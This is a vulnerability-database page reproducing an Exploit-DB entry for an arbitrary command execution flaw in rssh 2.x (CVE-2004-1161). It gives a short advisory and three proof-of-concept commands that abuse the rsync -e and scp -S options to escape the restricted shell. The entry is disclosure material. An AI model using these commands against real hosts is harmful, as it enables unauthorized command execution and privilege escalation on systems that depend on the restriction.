Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbJason WiesEDB-ID:24795
HistoryDec 02, 2004 - 12:00 a.m.

RSSH 2.x - Arbitrary Command Execution

2004-12-0200:00:00
Jason Wies
www.exploit-db.com
27

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/11792/info

rssh is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer.

All versions of rssh are considered vulnerable at the moment.

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp' 

scp command.sh restricteduser@remotehost:/tmp/command.sh 

ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'

Related

cvelist 1
ubuntucve 1
debiancve 1
cve 1
nvd 1
openvas 4
nessus 2
gentoo 1
cvelist
cvelist
CVE-2004-1161
2004-12-10 05:00:00
ubuntucve
ubuntucve
CVE-2004-1161
2005-01-10 00:00:00
debiancve
debiancve
CVE-2004-1161
2005-01-10 05:00:00
cve
cve
CVE-2004-1161
2005-01-10 05:00:00
nvd
nvd
CVE-2004-1161
2005-01-10 05:00:00
openvas
openvas
Gentoo Security Advisory GLSA 200412-01 (scponly)
2008-09-24 00:00:00
Gentoo Security Advisory GLSA 200412-01 (scponly)
2008-09-24 00:00:00
FreeBSD Ports: rssh
2008-09-04 00:00:00
nessus
nessus
FreeBSD : rssh & scponly -- arbitrary command execution (f11b219a-44b6-11d9-ae2f-021106004fd6)
2005-07-13 00:00:00
GLSA-200412-01 : rssh, scponly: Unrestricted command execution
2004-12-04 00:00:00
gentoo
gentoo
rssh, scponly: Unrestricted command execution
2004-12-03 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:24795
cvelist1ubuntucve1debiancve1cve1nvd1openvas4nessus2gentoo1